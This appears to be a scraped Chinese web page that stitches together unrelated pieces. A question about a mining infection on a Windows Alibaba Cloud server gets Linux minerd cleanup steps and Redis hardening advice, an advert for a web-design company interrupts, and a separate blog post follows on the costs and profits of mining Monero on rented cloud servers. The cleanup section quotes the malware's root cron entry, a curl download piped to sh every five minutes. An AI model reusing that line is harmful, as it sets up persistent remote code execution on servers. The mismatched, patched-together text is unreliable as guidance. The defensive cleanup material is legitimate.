阿里云windows服務(wù)器中了挖礦的病毒怎么清理？

光刪除沒用的，因為沒有解決好漏洞。

創(chuàng)新互聯(lián)公司，專注為中小企業(yè)提供官網(wǎng)建設(shè)、營銷型網(wǎng)站制作、響應(yīng)式網(wǎng)站、展示型成都網(wǎng)站制作、成都網(wǎng)站設(shè)計等服務(wù)，幫助中小企業(yè)通過網(wǎng)站體現(xiàn)價值、有效益。幫助企業(yè)快速建站、解決網(wǎng)站建設(shè)與網(wǎng)站營銷推廣問題。

建議是重做系統(tǒng)，然后找護衛(wèi)神給你做一下系統(tǒng)安全加固，把漏洞徹底堵住才有效果。

阿里云服務(wù)器被挖礦了怎么辦？(純純電腦小白

1. 關(guān)閉訪問挖礦服務(wù)器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執(zhí)行權(quán)限， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執(zhí)行計劃

5. 執(zhí)行top，查看了一會，沒有再發(fā)現(xiàn)minerd 進程了。

6.檢查/var/spool/cron/目錄下發(fā)現(xiàn)有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL | sh

病毒文件內(nèi)容如下，感興趣的可以研究下：

? View Code

解決minerd并不是最終的目的，主要是要查找問題根源，我的服務(wù)器問題出在了redis服務(wù)了，黑客利用了redis的一個漏洞獲得了服務(wù)器的訪問權(quán)限，然后就注入了病毒，下面是解決辦法和清除工作：

1. 修復(fù) redis 的后門,

配置bind選項, 限定可以連接Redis服務(wù)器的IP, 并修改redis的默認端口6379.

配置AUTH, 設(shè)置密碼, 密碼會以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權(quán)訪問, 也能夠給攻擊者使用config指令加大難度

好消息是Redis作者表示將會開發(fā)”real user”，區(qū)分普通用戶和admin權(quán)限，普通用戶將會被禁止運行某些命令，如conf

2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

云服務(wù)器挖礦踐行 第一篇

三天以前看到壯鄉(xiāng)金榮仔的文章，從中了解到可以利用阿里云服務(wù)器進行挖礦，收益可觀，于是立即和作者進行了聯(lián)系，咨詢拜師的事情。

通過和孫師傅交流發(fā)現(xiàn)，因為寫作讓我們有了很多共同交流的基礎(chǔ)，并且我居然已經(jīng)關(guān)注了孫師傅有好幾個月的時間了，這讓我們很快建立了信任。

孫師傅在文章中提到正式收徒弟還要等一段時間，我覺得這段時間也不能浪費，還應(yīng)該為將來拜師以后做一點準備工作。于是我立即開始對云服務(wù)挖礦這件事情進行了認真的思考并實踐。

云服務(wù)挖礦的可行性，大概有這么幾個方面。

一，云服務(wù)器挖礦的成本收益分析。

成本構(gòu)成：挖礦的成本主要有三項，礦機的支出，電費，場地及相關(guān)管理費用；

收益構(gòu)成：挖礦的收益主要來自兩個方面，一是按照當前數(shù)字貨幣的法幣價格可以不管成本而獲得的收益，二是數(shù)字貨幣在未來增值獲得的收益。

分析：云服務(wù)器的運算能力遠遠低于實體礦機，但是不用支付電費，這是最大的成本節(jié)省，另外，由于不需要場地，自己遠程管理，場地和管理費用也趨近于零。

因此在算力有限的情況下，云服務(wù)器挖礦最大限度地消除了電費和場地的費用，這是這項技術(shù)的優(yōu)勢所在。而盈利的平衡點，將極大的取決于服務(wù)器費用的支出和當前幣價的相對關(guān)系。

二，云服務(wù)器和挖礦幣種的分析。

云服務(wù)器的種類有很多，主要分兩種，CPU型和GPU型。

目前市場上的各種虛擬幣算法也分兩類，GPU友好型和CPU有好型。比特幣以太坊，萊特幣等絕大多數(shù)幣種都屬于GPU友好型，CPU友好型比較少，我了解到的只有大零幣zec,小零幣xzc,門羅幣xmr。

所以這樣一來，在服務(wù)器和幣種的選擇問題上，方向很清晰：CPU和GPU任何一個方向，選擇算力性價比最高的云服務(wù)器和挖礦收益最高的幣種。

三，實踐。

李笑來的文章中提到過，任何挖礦的行為都不如直接到市場上去買來得容易。我也因此在之前的虛擬貨幣的學(xué)習(xí)中，很少關(guān)注挖礦的知識。同時對于服務(wù)器方面的知識也了解很少，所以一開始我只能用網(wǎng)絡(luò)上能夠搜索得到的辦法進行實踐， 以快速入門，開始積累。

網(wǎng)上能夠直接搜索到的就是利用CPU服務(wù)器挖掘門羅幣。文章鏈接如下。

于是我花了391.5元購買了三個月的阿里云輕量型服務(wù)器，配置如下。阿里云目前在搞活動，首單可以打七折。

開始進行實踐。

經(jīng)過了兩天的折騰，終于在運行服務(wù)器上挖礦成功，但是算力只有140h/s，在這個算力下，要虧本一半。

具體折騰的過程中，遇到坑無數(shù)，也麻煩了我搞計算機的朋友很多，這個過程留待下一篇再寫吧。

四，關(guān)于風(fēng)險的思考。

目前來看，用云服務(wù)器挖礦服務(wù)器的價格是預(yù)付的，并且是固定的，所以挖礦是否有收益，取決于目前的虛擬貨幣的價格。從孫師傅的截圖來看，目前收益還是很可觀的。

近期的風(fēng)險來自于幣價的下跌，遠期的風(fēng)險來看，就是阿里云服務(wù)器會禁止挖礦行為。阿里云對于挖礦的行為，在網(wǎng)上有過很多的聲明。在搜索服務(wù)器挖礦相關(guān)知識的時候，也發(fā)現(xiàn)有國外的服務(wù)器禁止挖礦。

長期來看，如果目前云服務(wù)器挖礦不賠本那么未來大概率是會有很大的收益的。

就在寫這一篇的過程中，孫師傅的收徒標也發(fā)出來了，很快就要收徒弟啦。我也正好把這一篇當做我第一這周的作業(yè)。